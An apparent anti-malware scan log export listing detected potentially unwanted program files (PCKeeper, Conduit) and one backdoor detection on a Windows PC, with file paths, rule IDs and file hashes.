PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{74A530F1-01AC-4F5E-9DF8-9B0233E31358}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{8852ECE8-595D-427E-B5A0-F8D2E62FABBD}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{8DE0A0A1-96D0-4B04-8EC6-2DBF9BD888DC}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{8E93A1B1-8EF0-42e9-AC76-D2CA4CF28681}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{9061EE7F-1749-45C7-8806-48BE50E660C7}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{93821D1D-1047-4239-AA97-40E028199390}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{9844E279-4D56-44D5-860D-269865645F53}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{9B7F0841-B9EA-4E79-8483-D7D626814A2F}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{A204F211-90CC-4899-9F3A-066B4CB3CF15}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{A394DCA9-3727-11D4-BD85-00C04F6B93A4}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{A7F1AD6F-5AF8-4ABA-8BC7-EB1D2A42401A}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{AF8B3E35-A68A-4788-BDDA-76D8AE1C4064}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{B4928187-D2E3-4CFA-A2C2-A9C97B4956EA}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{B786AA8A-3748-4cf4-9F64-F4077DA25F0F}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{B9F1D9B8-1DA6-4F17-962F-69EC82EA2704}.reg, No Action By User, 1335, 437658, , , , , B7B4B98A34F3674D07DA0885772DBA08, 2047D55F44F66F3445A3E7A6E0A2F3F7DE9DB07DC8C60990963946A84DC08F35
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{D580254F-5E17-4AE0-9C41-60A0526A8ED6}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{D66DC78C-4F61-447F-942B-3FB6980118CF}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{D7E4AD91-2AFB-4AD7-A92F-71F6A44378DC}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{DE7B5FF6-5DCE-4623-B60C-587FF2AC04C6}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{DFEAF541-F3E1-4c24-ACAC-99C30715084A}.reg, No Action By User, 1335, 437658, , , , , EE834D2EDF78CEBD7B57238243E2C126, 40CF21F23783DB7D7EA71B523531190F269010A4E226D5C5C08673C8438F1DFE
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{E2D06167-6DCF-4BF6-A212-5C2F0161583A}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{F44DC845-F9E1-4907-8D9C-1472F72E8326}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{F5BF6FE9-913F-4117-94C7-5040C7E3A6C1}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Windows_CurrentVersion_App Paths_RealPlay.exe.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Windows_CurrentVersion_App Paths_rnxproc.exe.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Windows_CurrentVersion_Installer_Folders.reg, No Action By User, 1335, 437658, , , , , BED99345645E4B35D6C0333BDCBF47D3, 72A6F1E3BFA3B279C4366AD9F96BC05DA99DA9C4C7AC0869F910CE47346CA153
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Windows_CurrentVersion_SharedDLLs.reg, No Action By User, 1335, 437658, , , , , 36CBD7BF83A8091B8BBB35037A6BEF9A, 04A21BB8EEBFC405C725E1640ECB8B7FF85856434486B08DF5407F273DB60557
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00\HKEY_LOCAL_MACHINE_SOFTWARE_Wow6432Node_Microsoft_Windows_CurrentVersion_SharedDLLs.reg, No Action By User, 1335, 437658, , , , , 8DC6F6CE3B9A879A7AEC73DD69D54162, 24305359A55B6F3FDE3B896A205BE8015AC1C97D017B360F02F080A250BEAB27
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00\HKEY_LOCAL_MACHINE_SOFTWARE_Wow6432Node_Microsoft_Windows_CurrentVersion_Uninstall_ShopAtHome.com Toolbar.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00\HKEY_LOCAL_MACHINE_SOFTWARE_Wow6432Node_Microsoft_Windows_CurrentVersion_Uninstall_YInstHelper.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{003EB908-0B86-44F8-86F0-B19A7022449C}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{08FD8A78-64B6-4692-96D2-1A363A7E3B9A}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{137A78D3-65B7-4e2f-851C-6EC4B633B436}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{17CB3F3C-A6D3-486B-B044-CBCAE56EC2C0}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{1C109E4C-2F30-4EA3-A57A-A290877A2303}.reg, No Action By User, 1335, 437658, , , , , 8BE5095434F49F9530FBD823DF6A4010, 7E6D45D685AF7542EC9ABEB1128B0408BA7890B6226C58372E5A7D18CF12F8AF
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{1D1708DE-F500-4402-92ED-5CA693DABE72}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{21CB022B-12DA-4981-97DF-6CDCA8615A05}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{2CD26C3A-654C-4E82-9EEC-E15D26223057}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{35D7A7FA-8AB2-401c-983E-919903F5D5AD}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{46B937EC-70B1-4369-80E1-C250E3F5D4EE}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{506F4668-F13E-4AA1-BB04-B43203AB3CC0}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{53AA8AFA-807E-4272-87D9-BBA51A9DB376}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00\HKEY_LOCAL_MACHINE_SOFTWARE_Wow6432Node_Microsoft_Windows_CurrentVersion_SharedDLLs.reg, No Action By User, 1335, 437658, , , , , 881CCCC5B4AD4EE90FC74AEF9A407AAF, 72A965AB557F19E75EC2D11FFEC2C041EA6426206930F98A8D6D3E7120D1DA29
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\ProblemFinder\RegistryScan.xml, No Action By User, 1335, 437658, , , , , 524CEB36F95893FA302B138552485F97, 2E460A3ACBB1958C83EA56812155575DD090BBF2FF9C86C95C8F703D31275C24
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\ProblemFinder\ScanReport.xml, No Action By User, 1335, 437658, , , , , F926DD67EBF6CBBB48BBC74F0232E2F1, 8F619F27B8A38913765E377BA5B51547A054C66F1361295EEB3D6B5EFE3C453F
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\ProblemFinder\SystemScan.xml, No Action By User, 1335, 437658, , , , , 93F1721CB7A74D6101439F309AE80FDC, DFC1047FCC416F9BF4EC555B6F36AFE10E68862BE24462FEB0343BB6D9EF3CB4
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\CrashReportSender.llog, No Action By User, 1335, 437658, , , , , B9B90E6D45095EA7C4FCFD7DAEE9B4F8, 057FFB385190F40A839DC12EEF65EB81AF8943CB29F301C4DC96345B89D4D59E
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\OneClickFixService.exe0.llog, No Action By User, 1335, 437658, , , , , 7E8F113D55856903D87E104EC9E5BFC0, 138057ACB3D3B621102C3E8BD32CDB9DD9D9C2F66909B8F1BAEC251FC9B8AB88
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\OneClickFixService.exe1.llog, No Action By User, 1335, 437658, , , , , 584D745C4DDEC35CC743605DBCBD9200, 51EEAD853E09F72B9C51116EF9B34B82CB63964B8E1BCAE2AA10A0E115498E3D
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\OneClickFixService.exe2.llog, No Action By User, 1335, 437658, , , , , 5098EAFC3E8748A556AFEF85FA7C1165, 3F2C01249CF977158579C6F7E450392806120CB091A5CD15EC9D2A9A97135565
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\OneClickFixService.exe3.llog, No Action By User, 1335, 437658, , , , , 645ED5A74B9B875F3D997B2932639213, 3EC5506160F3251E79311907A24A53D481BCC2690E2BB9DBC61F56263CCA5C7B
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\OneClickFixService.exe4.llog, No Action By User, 1335, 437658, , , , , 3F030F92D695677825C6BB5AD2181D97, 56009637BF00238EBDB914056368C2497732ED00B5A9D4D2A2CF763738C8C5E0
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeper.exe0.llog, No Action By User, 1335, 437658, , , , , 5A7D5BF8B05DAA8F583382B09888E7B4, 79392A4FD9ABFC38DB6BD4F665976CA478E2224F30B811662E2065649B2BA53C
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeper.exe1.llog, No Action By User, 1335, 437658, , , , , ED23C64BAC323CB7743E615FCA2D4496, 7CD06EA96DE5CFF2E8712D3798FC6E00F059E53FD88CC516220C502CB06AB50A
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeper.exe2.llog, No Action By User, 1335, 437658, , , , , 7012C286A8E407CFC27171572516D748, 8D60B5F2A6B5DA7B0006FE235B9979390D520B26B8EFCEC6BD2D142C2DCC41CA
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeper.exe3.llog, No Action By User, 1335, 437658, , , , , 813175F8F674BE69F1791D7A384AC5FF, 110DE11A8FC2258F0AD39191CF854F88C6B1021B7D6354299471664F5E3401A9
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeper.exe4.llog, No Action By User, 1335, 437658, , , , , 0C7CEAEC5D6A9B130E5A642FE521C953, C0505ABA1D5D0166C780A1886F02C4E2EA656B65D5A4F15FD4C1990C5A841EF6
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeper.llog, No Action By User, 1335, 437658, , , , , 4C533D5DF321239719449474F8EE1059, 33598E581347666C80A1D3485A6B8AF2AF6CE446C0B902C5BCFE0AC3E95F50E0
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeperService.exe0.llog, No Action By User, 1335, 437658, , , , , FB0B484A6E874261AA3FB9EBF962AA16, E0E65B64D071381DF474CEE06EE13E24F8A0AD2EE68065C85D99E6160DD2300A
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeperService.exe1.llog, No Action By User, 1335, 437658, , , , , A845005E3F4134DDE3CFA9CB2DE71986, C717F141729EDF37D673770C40BC5A76B60B2475288B59CD3A7646F518531A25
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeperService.exe2.llog, No Action By User, 1335, 437658, , , , , 74A3234EE7488ABF3EBBC578E654B530, C8AE96DB393C097ABD473FB409BFE85E33EA2BA4A919F388F69AEF2054303955
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeperService.exe3.llog, No Action By User, 1335, 437658, , , , , D751956EF7245A6446995D44E17CA61B, BD69C9C956B3BCBCF7242FA2823003DA6F16A9C1BBCA4DA441553A0332D3BA5A
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeperService.exe4.llog, No Action By User, 1335, 437658, , , , , 46801F248FA4CAA2D34B4DB6924930D5, 9769F500E18E50D42173E0F04AB834BA2028A34F07F722BBA91903DCB85878A5
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\PCKeeperService.llog, No Action By User, 1335, 437658, , , , , 08DEE1A1BBCF18AA1C700949A14D17E4, 21A5FC68AA1B35858C4FE9EC2576C768F3A78CD1F030BD2ABB9CBE0CC10C023C
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\RegistryCleanerComponent.dll0.llog, No Action By User, 1335, 437658, , , , , 645AFE022640E48C9AB46B9B244AE066, 9ADE3F8280F9C145200F4185DC8F853BE7EE09E385B099652D2E28B2263B6124
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\RegistryCleanerComponent.dll1.llog, No Action By User, 1335, 437658, , , , , 3C4DDD08532C62A1B499AA504FDDB556, 1A72F084C0FD9E8BE479CAD5C7F12BB72D30234D9808D9F1B73BD7B377C17A88
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\RegistryCleanerComponent.dll2.llog, No Action By User, 1335, 437658, , , , , BA0DFD255E7563475F054C341512EE10, 3F1F547F9E5603A8A56D6CE2527BB5C135443FCEDAE3BCB4DC812E4E58CCDBFE
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\RegistryCleanerComponent.dll3.llog, No Action By User, 1335, 437658, , , , , 6F79E82D76D941D84C1A095861464FC0, 80E0B83A6F3A6CC66224988F8961FCD1B1804464088D1B9D447896064F012008
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\RegistryCleanerComponent.dll4.llog, No Action By User, 1335, 437658, , , , , 057C03D0EE5B06AC0B9EEBCF21CFA22A, 2D9B09206D9AFFAA18A3F5ECE2BB1B9C188200551D01A23CE08FD1908A1213BD
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\release_notes.txt, No Action By User, 1335, 437658, , , , , 9533998B9A39BE1396AB7977E71A5C25, FDDB001B576D5630A61B68E2A3025EE3F4CC9C00B98BEA10ED2370C884728B4B
Backdoor.ForShare.WmiBit, C:\WINDOWS\DEBUG\ITEM.DAT, No Action By User, 5870, 430781, 1.0.49973, 934DFF28910F34B6F6548AFF, dds, 01603864, BDFA523E5A06C417E30F0DAECB6215F3, 1E8441F0D32D3854E0B3801063F6015A9F09637D77B714F8E58FB8C198693A51
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark\close.png, No Action By User, 181, 182117, , , , , F2F46CE0DDF7FA2D662F81D5B5980E16, 9E21A00F4080650CE150B3E6260D7A8AE1158AEFB51A8F61D4071A9B00C63219
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark\Next.png, No Action By User, 181, 182117, , , , , 4EECF5EFD00671CFC019065080FB043C, 1CACC4D8D7895FD651E7C768AAAC1F3A03CF653E10925C2CFE86E32897F6BF94
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark\Next_hover.png, No Action By User, 181, 182117, , , , , 28DA4BC294EBEA328DF5FBEE85BF3C2F, F8EF3BAFBBA779B4E60FF349C91BA9922D8A16AE7E520018C286D35A434D65BA
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark\powered-by.png, No Action By User, 181, 182117, , , , , C5640EB96B765545FADD17718F0AC09C, E9AA83F5606AA85E0C589EE099E660EE751EF25146A37502FB6C5D71E0D5544C
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark\Prev.png, No Action By User, 181, 182117, , , , , B961B74A05AB150BE16A33FB5E738411, 2FBBAFEE5C10FF420F4E174DDF9FFD9CCA95165A40CE3270ED1F25D47AE1BF6A
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark\Prev_hover.png, No Action By User, 181, 182117, , , , , EC6F265B66B4656E3CA38E7F4EE75D6B, D7F79A496DDA21F6D1928A0483AC8664FC89480F36948A705D8CA9E7ED32F306
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark\settings.png, No Action By User, 181, 182117, , , , , 0D932BC8C44C82FFF1B1E967EC938ABB, FF89F07E6002B485C9CF985B422F4714DFCFCFFB9DE88787F800FD8A003DD355
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light\close.png, No Action By User, 181, 182117, , , , , 7DD805B772208B23BF3BB35B0563A0F7, AD3A0C7B3A2A402676077A8CD9F6B19B820E4AA51CE134B2BA590086239C1D62
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light\Next.png, No Action By User, 181, 182117, , , , , BE31B1CC62EF63B42108FD1EB25AD6C4, 90E56B1632C02D10915D7D412C1239761B0010A2AFD4874B361013A523C687AE
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light\Next_hover.png, No Action By User, 181, 182117, , , , , 1ED4AD5639808B98FA1095A75698A7BD, CE8703E13E18A7D41942A61CCF62E1C2CDC94D129D0437BFD41FDC8A961F8D3D
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light\powered-by.png, No Action By User, 181, 182117, , , , , 5B71105A6F89CFAE8CD56757B10674E7, 63F883ADC4D6878B41371CEEECC9CEBD1AF29E387CCACC55F8EAEE9911B6ED8A
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light\Prev.png, No Action By User, 181, 182117, , , , , 1C29361D0772000CB114ED5C149D0798, DC5F5F6EFF165E0E0CE8350CF15A7A499AEFF8DDD4BF00D32B848E7B9D51FF64
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light\Prev_hover.png, No Action By User, 181, 182117, , , , , 47BF0A489ED2951B21744AD7D29C4056, CADD144A94AF0678CC4FFFDB49ABEF5F37039A370AFD10B2004952607A72FBF6
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light\settings.png, No Action By User, 181, 182117, , , , , 4E88CEBE3F5D0C6744F9487052E208A3, B573EB461D2C657C54616E0C25972A70F29C2EE1A15E4439535E84A7A757F1C3
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\close.png, No Action By User, 181, 182117, , , , , 6B66C28004038C7C30918AD4BCD3C79D, FC2DC90A1AD88C6FC9CB41560585C0F0E8BE90F4A9737D74E0F6177F41A9BC13
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\like.png, No Action By User, 181, 182117, , , , , 65CAADF446B45637DDD0C242A8B0B2F7, 91250D8DE3E12ACF9D5AA81FACE1FAEA8DE914F06E03E238EA61714E5975DB41
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\Next.png, No Action By User, 181, 182117, , , , , BE31B1CC62EF63B42108FD1EB25AD6C4, 90E56B1632C02D10915D7D412C1239761B0010A2AFD4874B361013A523C687AE
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\Next_hover.png, No Action By User, 181, 182117, , , , , 1ED4AD5639808B98FA1095A75698A7BD, CE8703E13E18A7D41942A61CCF62E1C2CDC94D129D0437BFD41FDC8A961F8D3D
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\powered-by.png, No Action By User, 181, 182117, , , , , 5B71105A6F89CFAE8CD56757B10674E7, 63F883ADC4D6878B41371CEEECC9CEBD1AF29E387CCACC55F8EAEE9911B6ED8A
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\Prev.png, No Action By User, 181, 182117, , , , , 1C29361D0772000CB114ED5C149D0798, DC5F5F6EFF165E0E0CE8350CF15A7A499AEFF8DDD4BF00D32B848E7B9D51FF64
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\Prev_hover.png, No Action By User, 181, 182117, , , , , 47BF0A489ED2951B21744AD7D29C4056, CADD144A94AF0678CC4FFFDB49ABEF5F37039A370AFD10B2004952607A72FBF6
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\settings.png, No Action By User, 181, 182117, , , , , 4E88CEBE3F5D0C6744F9487052E208A3, B573EB461D2C657C54616E0C25972A70F29C2EE1A15E4439535E84A7A757F1C3
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\AppNotification.js, No Action By User, 181, 182117, , , , , 7E5F58C7789DE0D4900F5DB35497FB9C, B4D6EF8A6DBC55BD6B6369A60D35DF4E6709C38628A593575B308DE88FF11306
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\initialNotification.html, No Action By User, 181, 182117, , , , , 54DA6E44C84EF832A0577565DAFE282C, 777C67AA47B1D395F8AC5F066EC64A372F46A23A3A06823499EB332873EE3E71
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\main.html, No Action By User, 181, 182117, , , , , 9931E2C2CDDFCA97E5187ED1CB802698, D751B81FB7D9DC7F9ABAC74ACEB87C111217AF72F6FD0EEE2DC0BCFD0248E536
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\NotificationDialogStyle.css, No Action By User, 181, 182117, , , , , AD9807FA69D8441B7A51BB8FD188A6C3, C42652932C1E3F9C113F5B427CB6E4337D0ED4C721E0A6A46D066F815A61AD6B
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\sampleNotification.html, No Action By User, 181, 182117, , , , , 702722A7B4F482DCCAD47A02401B9C46, 633DFE61A48BADBAC89937E8B4FDC5041249293D206A88217C7C6956F3D1EF89
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\DialogsAPI.js, No Action By User, 181, 182117, , , , , 939828BCEC7BBDFAB505E901D735FA5A, 4D9B445CCA901FB4E5AA4D9585E721BB819D3A6B8A5567E1B89873F2929FC1B2
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\PIE.htc, No Action By User, 181, 182117, , , , , A219E20E2678B66B24B9067A2E228A8D, 172EAF95AE8EE7073D7D2D20A11B13EAAF0A355D426F0C839A06296C534DB344
